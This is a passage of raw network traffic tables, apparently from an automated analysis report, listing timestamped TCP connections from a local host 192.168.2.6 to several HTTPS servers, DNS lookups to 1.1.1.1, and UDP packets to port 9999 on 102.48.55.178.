                        Jul 3, 2024 14:39:22.921308041 CEST49750443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:22.921329021 CEST44349750102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:23.182504892 CEST44349752102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:23.195492983 CEST49752443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:23.195513964 CEST44349752102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:23.196084023 CEST44349752102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:23.203062057 CEST49752443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:23.203139067 CEST44349752102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:23.246800900 CEST49752443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:23.817877054 CEST49752443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:23.864490986 CEST44349752102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:24.025505066 CEST49753443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:24.025547981 CEST4434975340.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:24.025604963 CEST49753443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:24.026662111 CEST49753443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:24.026673079 CEST4434975340.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:24.058275938 CEST49754443192.168.2.6104.17.3.184
                        Jul 3, 2024 14:39:24.058304071 CEST44349754104.17.3.184192.168.2.6
                        Jul 3, 2024 14:39:24.058403969 CEST49754443192.168.2.6104.17.3.184
                        Jul 3, 2024 14:39:24.059362888 CEST49754443192.168.2.6104.17.3.184
                        Jul 3, 2024 14:39:24.059374094 CEST44349754104.17.3.184192.168.2.6
                        Jul 3, 2024 14:39:24.062766075 CEST49755443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:24.062807083 CEST44349755102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:24.062941074 CEST49755443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:24.063158035 CEST49755443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:24.063174963 CEST44349755102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:24.116961002 CEST44349752102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:24.116987944 CEST44349752102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:24.116996050 CEST44349752102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:24.117011070 CEST44349752102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:24.117021084 CEST44349752102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:24.117027998 CEST44349752102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:24.117115021 CEST49752443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:24.117130995 CEST44349752102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:24.117145061 CEST44349752102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:24.117177010 CEST49752443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:24.117212057 CEST49752443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:24.160779953 CEST49752443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:24.160804987 CEST44349752102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:24.525515079 CEST44349754104.17.3.184192.168.2.6
                        Jul 3, 2024 14:39:24.586275101 CEST49754443192.168.2.6104.17.3.184
                        Jul 3, 2024 14:39:24.586298943 CEST44349754104.17.3.184192.168.2.6
                        Jul 3, 2024 14:39:24.586855888 CEST44349754104.17.3.184192.168.2.6
                        Jul 3, 2024 14:39:24.596620083 CEST49756443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:24.596658945 CEST44349756102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:24.596749067 CEST49756443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:24.601072073 CEST49754443192.168.2.6104.17.3.184
                        Jul 3, 2024 14:39:24.601149082 CEST44349754104.17.3.184192.168.2.6
                        Jul 3, 2024 14:39:24.605040073 CEST49756443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:24.605057001 CEST44349756102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:24.665143013 CEST49754443192.168.2.6104.17.3.184
                        Jul 3, 2024 14:39:24.708502054 CEST44349754104.17.3.184192.168.2.6
                        Jul 3, 2024 14:39:24.773520947 CEST44349754104.17.3.184192.168.2.6
                        Jul 3, 2024 14:39:24.773603916 CEST44349754104.17.3.184192.168.2.6
                        Jul 3, 2024 14:39:24.774197102 CEST49754443192.168.2.6104.17.3.184
                        Jul 3, 2024 14:39:24.774197102 CEST49754443192.168.2.6104.17.3.184
                        Jul 3, 2024 14:39:24.829827070 CEST4434975340.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:24.829914093 CEST49753443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:24.830097914 CEST44349755102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:24.834022045 CEST49753443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:24.834028959 CEST4434975340.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:24.834275961 CEST4434975340.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:24.834451914 CEST49755443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:24.834464073 CEST44349755102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:24.834817886 CEST44349755102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:24.835340023 CEST49755443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:24.835426092 CEST44349755102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:24.835973978 CEST49755443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:24.836661100 CEST49753443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:24.836745977 CEST49753443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:24.836750984 CEST4434975340.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:24.836891890 CEST49753443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:24.854790926 CEST49705443192.168.2.6173.222.162.64
                        Jul 3, 2024 14:39:24.862026930 CEST44349705173.222.162.64192.168.2.6
                        Jul 3, 2024 14:39:24.880489111 CEST44349755102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:24.880510092 CEST4434975340.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:25.015448093 CEST4434975340.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:25.015765905 CEST4434975340.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:25.015837908 CEST49753443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:25.016062975 CEST49753443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:25.016083002 CEST4434975340.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:25.102818012 CEST49754443192.168.2.6104.17.3.184
                        Jul 3, 2024 14:39:25.102849960 CEST44349754104.17.3.184192.168.2.6
                        Jul 3, 2024 14:39:25.219713926 CEST44349755102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:25.219800949 CEST44349755102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:25.219846964 CEST49755443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:25.220943928 CEST49755443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:25.220967054 CEST44349755102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:25.405108929 CEST44349756102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:25.405468941 CEST49756443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:25.405487061 CEST44349756102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:25.405869007 CEST44349756102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:25.406491995 CEST49756443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:25.406573057 CEST44349756102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:25.406826019 CEST49756443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:25.406845093 CEST49756443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:25.406900883 CEST44349756102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:25.886358976 CEST44349756102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:25.886461973 CEST44349756102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:25.886651993 CEST49756443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:25.964818001 CEST49756443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:25.964840889 CEST44349756102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:26.004681110 CEST49758443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:26.004717112 CEST44349758102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:26.005043030 CEST49758443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:26.005414963 CEST49758443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:26.005429983 CEST44349758102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:26.006659985 CEST49759443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:26.006705999 CEST44349759102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:26.006795883 CEST49759443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:26.007220984 CEST49759443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:26.007231951 CEST44349759102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:26.008136988 CEST49760443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:26.008167982 CEST44349760102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:26.008234978 CEST49760443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:26.008502007 CEST49760443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:26.008517027 CEST44349760102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:26.143801928 CEST49761443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:26.143846989 CEST4434976140.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:26.144126892 CEST49761443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:26.144855976 CEST49761443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:26.144870043 CEST4434976140.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:26.800779104 CEST44349759102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:26.801074982 CEST49759443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:26.801086903 CEST44349759102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:26.801377058 CEST44349759102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:26.801748037 CEST49759443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:26.801789045 CEST44349759102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:26.802042961 CEST49759443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:26.805107117 CEST44349758102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:26.805335045 CEST49758443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:26.805347919 CEST44349758102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:26.805706024 CEST44349758102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:26.806039095 CEST49758443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:26.806102037 CEST44349758102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:26.848496914 CEST44349759102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:26.888065100 CEST44349760102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:26.889038086 CEST49760443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:26.889054060 CEST44349760102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:26.889437914 CEST44349760102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:26.890887976 CEST49760443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:26.890973091 CEST44349760102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:26.891113997 CEST49760443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:26.917917967 CEST49758443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:26.932492971 CEST44349760102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:27.014888048 CEST49760443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:27.031505108 CEST4434976140.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:27.031583071 CEST49761443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:27.036603928 CEST49761443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:27.036614895 CEST4434976140.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:27.036880970 CEST4434976140.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:27.038254023 CEST49761443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:27.038383961 CEST49761443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:27.038389921 CEST4434976140.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:27.038558960 CEST49761443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:27.080491066 CEST4434976140.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:27.214509964 CEST4434976140.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:27.214719057 CEST4434976140.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:27.214967966 CEST49761443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:27.216150999 CEST49761443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:27.216166973 CEST4434976140.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:27.249432087 CEST44349759102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:27.249489069 CEST44349759102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:27.249553919 CEST44349759102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:27.249555111 CEST49759443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:27.249598026 CEST49759443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:27.250821114 CEST49759443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:27.250844002 CEST44349759102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:27.278902054 CEST49758443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:27.324500084 CEST44349758102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:27.328737974 CEST44349760102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:27.328766108 CEST44349760102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:27.328835011 CEST49760443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:27.328850985 CEST44349760102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:27.328866005 CEST44349760102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:27.328941107 CEST49760443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:27.330492020 CEST49760443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:27.330508947 CEST44349760102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:27.672646999 CEST44349758102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:27.672673941 CEST44349758102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:27.672739983 CEST49758443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:27.672754049 CEST44349758102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:27.672791958 CEST49758443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:27.673892975 CEST49758443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:27.673921108 CEST44349758102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:27.710390091 CEST49763443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:27.710436106 CEST44349763102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:27.710591078 CEST49763443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:27.711083889 CEST49763443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:27.711098909 CEST44349763102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:28.456553936 CEST44349763102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:28.511538982 CEST49763443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:28.579288006 CEST49763443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:28.579298973 CEST44349763102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:28.579824924 CEST44349763102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:28.580992937 CEST49763443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:28.581056118 CEST44349763102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:28.581530094 CEST49763443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:28.624497890 CEST44349763102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:28.911035061 CEST44349763102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:28.911067009 CEST44349763102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:28.911115885 CEST49763443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:28.911132097 CEST44349763102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:28.911144018 CEST44349763102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:28.911170959 CEST49763443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:28.911206961 CEST49763443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:28.912269115 CEST49763443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:28.912288904 CEST44349763102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:42.713493109 CEST49764443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:42.713530064 CEST4434976440.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:42.713599920 CEST49764443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:42.714207888 CEST49764443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:42.714215994 CEST4434976440.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:43.507026911 CEST4434976440.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:43.507100105 CEST49764443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:43.509295940 CEST49764443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:43.509301901 CEST4434976440.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:43.509581089 CEST4434976440.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:43.511512041 CEST49764443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:43.511574030 CEST49764443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:43.511579990 CEST4434976440.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:43.511790991 CEST49764443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:43.552525043 CEST4434976440.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:43.702713013 CEST4434976440.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:43.702790976 CEST4434976440.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:43.703187943 CEST49764443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:43.703707933 CEST49764443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:43.703741074 CEST4434976440.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:49.656759024 CEST49765443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:49.656790018 CEST4434976540.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:49.656874895 CEST49765443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:49.657514095 CEST49765443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:49.657524109 CEST4434976540.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:51.114614964 CEST4434976540.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:51.114686966 CEST49765443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:51.118834019 CEST49765443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:51.118839979 CEST4434976540.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:51.119160891 CEST4434976540.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:51.120543003 CEST49765443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:51.120587111 CEST49765443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:51.120600939 CEST4434976540.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:51.120696068 CEST49765443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:51.168498039 CEST4434976540.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:51.295145035 CEST4434976540.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:51.295742035 CEST49765443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:51.295774937 CEST4434976540.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:51.295795918 CEST49765443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:51.295825005 CEST49765443192.168.2.640.113.103.199
                        Jul 3, 2024 14:40:06.263339996 CEST49768443192.168.2.6142.250.186.164
                        Jul 3, 2024 14:40:06.263392925 CEST44349768142.250.186.164192.168.2.6
                        Jul 3, 2024 14:40:06.263560057 CEST49768443192.168.2.6142.250.186.164
                        Jul 3, 2024 14:40:06.267011881 CEST49768443192.168.2.6142.250.186.164
                        Jul 3, 2024 14:40:06.267026901 CEST44349768142.250.186.164192.168.2.6
                        Jul 3, 2024 14:40:06.771219015 CEST49769443192.168.2.640.115.3.253
                        Jul 3, 2024 14:40:06.771250010 CEST4434976940.115.3.253192.168.2.6
                        Jul 3, 2024 14:40:06.771332026 CEST49769443192.168.2.640.115.3.253
                        Jul 3, 2024 14:40:06.772404909 CEST49769443192.168.2.640.115.3.253
                        Jul 3, 2024 14:40:06.772422075 CEST4434976940.115.3.253192.168.2.6
                        Jul 3, 2024 14:40:06.995968103 CEST44349768142.250.186.164192.168.2.6
                        Jul 3, 2024 14:40:06.996246099 CEST49768443192.168.2.6142.250.186.164
                        Jul 3, 2024 14:40:06.996275902 CEST44349768142.250.186.164192.168.2.6
                        Jul 3, 2024 14:40:06.997164011 CEST44349768142.250.186.164192.168.2.6
                        Jul 3, 2024 14:40:06.997494936 CEST49768443192.168.2.6142.250.186.164
                        Jul 3, 2024 14:40:06.997648001 CEST44349768142.250.186.164192.168.2.6
                        Jul 3, 2024 14:40:07.043488979 CEST49768443192.168.2.6142.250.186.164
                        Jul 3, 2024 14:40:07.553569078 CEST4434976940.115.3.253192.168.2.6
                        Jul 3, 2024 14:40:07.553739071 CEST49769443192.168.2.640.115.3.253
                        Jul 3, 2024 14:40:07.556776047 CEST49769443192.168.2.640.115.3.253
                        Jul 3, 2024 14:40:07.556788921 CEST4434976940.115.3.253192.168.2.6
                        Jul 3, 2024 14:40:07.557107925 CEST4434976940.115.3.253192.168.2.6
                        Jul 3, 2024 14:40:07.559758902 CEST49769443192.168.2.640.115.3.253
                        Jul 3, 2024 14:40:07.559812069 CEST49769443192.168.2.640.115.3.253
                        Jul 3, 2024 14:40:07.559818029 CEST4434976940.115.3.253192.168.2.6
                        Jul 3, 2024 14:40:07.560142994 CEST49769443192.168.2.640.115.3.253
                        Jul 3, 2024 14:40:07.600506067 CEST4434976940.115.3.253192.168.2.6
                        Jul 3, 2024 14:40:07.734493971 CEST4434976940.115.3.253192.168.2.6
                        Jul 3, 2024 14:40:07.734880924 CEST4434976940.115.3.253192.168.2.6
                        Jul 3, 2024 14:40:07.735035896 CEST49769443192.168.2.640.115.3.253
                        Jul 3, 2024 14:40:07.735035896 CEST49769443192.168.2.640.115.3.253
                        Jul 3, 2024 14:40:07.735035896 CEST49769443192.168.2.640.115.3.253
                        Jul 3, 2024 14:40:07.735065937 CEST4434976940.115.3.253192.168.2.6
                        Jul 3, 2024 14:40:16.640444040 CEST49770443192.168.2.640.115.3.253
                        Jul 3, 2024 14:40:16.640492916 CEST4434977040.115.3.253192.168.2.6
                        Jul 3, 2024 14:40:16.641052961 CEST49770443192.168.2.640.115.3.253
                        Jul 3, 2024 14:40:16.641272068 CEST49770443192.168.2.640.115.3.253
                        Jul 3, 2024 14:40:16.641294003 CEST4434977040.115.3.253192.168.2.6
                        Jul 3, 2024 14:40:16.900664091 CEST44349768142.250.186.164192.168.2.6
                        Jul 3, 2024 14:40:16.900741100 CEST44349768142.250.186.164192.168.2.6
                        Jul 3, 2024 14:40:16.900821924 CEST49768443192.168.2.6142.250.186.164
                        Jul 3, 2024 14:40:17.438623905 CEST4434977040.115.3.253192.168.2.6
                        Jul 3, 2024 14:40:17.438700914 CEST49770443192.168.2.640.115.3.253
                        Jul 3, 2024 14:40:17.440327883 CEST49770443192.168.2.640.115.3.253
                        Jul 3, 2024 14:40:17.440354109 CEST4434977040.115.3.253192.168.2.6
                        Jul 3, 2024 14:40:17.440617085 CEST4434977040.115.3.253192.168.2.6
                        Jul 3, 2024 14:40:17.441771984 CEST49770443192.168.2.640.115.3.253
                        Jul 3, 2024 14:40:17.441828966 CEST49770443192.168.2.640.115.3.253
                        Jul 3, 2024 14:40:17.441842079 CEST4434977040.115.3.253192.168.2.6
                        Jul 3, 2024 14:40:17.441917896 CEST49770443192.168.2.640.115.3.253
                        Jul 3, 2024 14:40:17.484503984 CEST4434977040.115.3.253192.168.2.6
                        Jul 3, 2024 14:40:18.634296894 CEST4434977040.115.3.253192.168.2.6
                        Jul 3, 2024 14:40:18.634392023 CEST4434977040.115.3.253192.168.2.6
                        Jul 3, 2024 14:40:18.635133028 CEST49770443192.168.2.640.115.3.253
                        Jul 3, 2024 14:40:18.635314941 CEST49770443192.168.2.640.115.3.253
                        Jul 3, 2024 14:40:18.635332108 CEST4434977040.115.3.253192.168.2.6
                        Jul 3, 2024 14:40:18.635392904 CEST49770443192.168.2.640.115.3.253
                        Jul 3, 2024 14:40:18.686440945 CEST49768443192.168.2.6142.250.186.164
                        Jul 3, 2024 14:40:18.686470985 CEST44349768142.250.186.164192.168.2.6
                        TimestampSource PortDest PortSource IPDest IP
                        Jul 3, 2024 14:39:02.304032087 CEST53542001.1.1.1192.168.2.6
                        Jul 3, 2024 14:39:02.326853991 CEST53611471.1.1.1192.168.2.6
                        Jul 3, 2024 14:39:03.304428101 CEST53615281.1.1.1192.168.2.6
                        Jul 3, 2024 14:39:03.929197073 CEST5789553192.168.2.61.1.1.1
                        Jul 3, 2024 14:39:03.929506063 CEST5314753192.168.2.61.1.1.1
                        Jul 3, 2024 14:39:03.945728064 CEST53531471.1.1.1192.168.2.6
                        Jul 3, 2024 14:39:03.945952892 CEST53578951.1.1.1192.168.2.6
                        Jul 3, 2024 14:39:04.554872990 CEST5570453192.168.2.61.1.1.1
                        Jul 3, 2024 14:39:04.555092096 CEST5264453192.168.2.61.1.1.1
                        Jul 3, 2024 14:39:05.299428940 CEST53526441.1.1.1192.168.2.6
                        Jul 3, 2024 14:39:05.311568975 CEST53557041.1.1.1192.168.2.6
                        Jul 3, 2024 14:39:06.213712931 CEST5902053192.168.2.61.1.1.1
                        Jul 3, 2024 14:39:06.214382887 CEST5251953192.168.2.61.1.1.1
                        Jul 3, 2024 14:39:06.222037077 CEST53525191.1.1.1192.168.2.6
                        Jul 3, 2024 14:39:06.223252058 CEST53590201.1.1.1192.168.2.6
                        Jul 3, 2024 14:39:09.936923027 CEST5659753192.168.2.61.1.1.1
                        Jul 3, 2024 14:39:09.937375069 CEST6223453192.168.2.61.1.1.1
                        Jul 3, 2024 14:39:10.660893917 CEST53565971.1.1.1192.168.2.6
                        Jul 3, 2024 14:39:10.673886061 CEST53622341.1.1.1192.168.2.6
                        Jul 3, 2024 14:39:10.788654089 CEST5018253192.168.2.61.1.1.1
                        Jul 3, 2024 14:39:10.788829088 CEST5262553192.168.2.61.1.1.1
                        Jul 3, 2024 14:39:10.795547009 CEST53501821.1.1.1192.168.2.6
                        Jul 3, 2024 14:39:10.797036886 CEST53526251.1.1.1192.168.2.6
                        Jul 3, 2024 14:39:12.275263071 CEST5382653192.168.2.61.1.1.1
                        Jul 3, 2024 14:39:12.275875092 CEST6395653192.168.2.61.1.1.1
                        Jul 3, 2024 14:39:12.283842087 CEST53538261.1.1.1192.168.2.6
                        Jul 3, 2024 14:39:12.283857107 CEST53639561.1.1.1192.168.2.6
                        Jul 3, 2024 14:39:13.712188959 CEST5492953192.168.2.61.1.1.1
                        Jul 3, 2024 14:39:13.712188959 CEST5131553192.168.2.61.1.1.1
                        Jul 3, 2024 14:39:13.719536066 CEST53549291.1.1.1192.168.2.6
                        Jul 3, 2024 14:39:13.722379923 CEST53513151.1.1.1192.168.2.6
                        Jul 3, 2024 14:39:13.955188990 CEST5187853192.168.2.61.1.1.1
                        Jul 3, 2024 14:39:13.955502033 CEST5658053192.168.2.61.1.1.1
                        Jul 3, 2024 14:39:14.668899059 CEST53565801.1.1.1192.168.2.6
                        Jul 3, 2024 14:39:14.679567099 CEST6077553192.168.2.61.1.1.1
                        Jul 3, 2024 14:39:14.684743881 CEST53518781.1.1.1192.168.2.6
                        Jul 3, 2024 14:39:14.736032009 CEST493089999192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:15.142863989 CEST493089999192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:15.395940065 CEST53607751.1.1.1192.168.2.6
                        Jul 3, 2024 14:39:16.116705894 CEST493089999192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:17.300570965 CEST493089999192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:19.371436119 CEST493089999192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:20.917682886 CEST53494161.1.1.1192.168.2.6
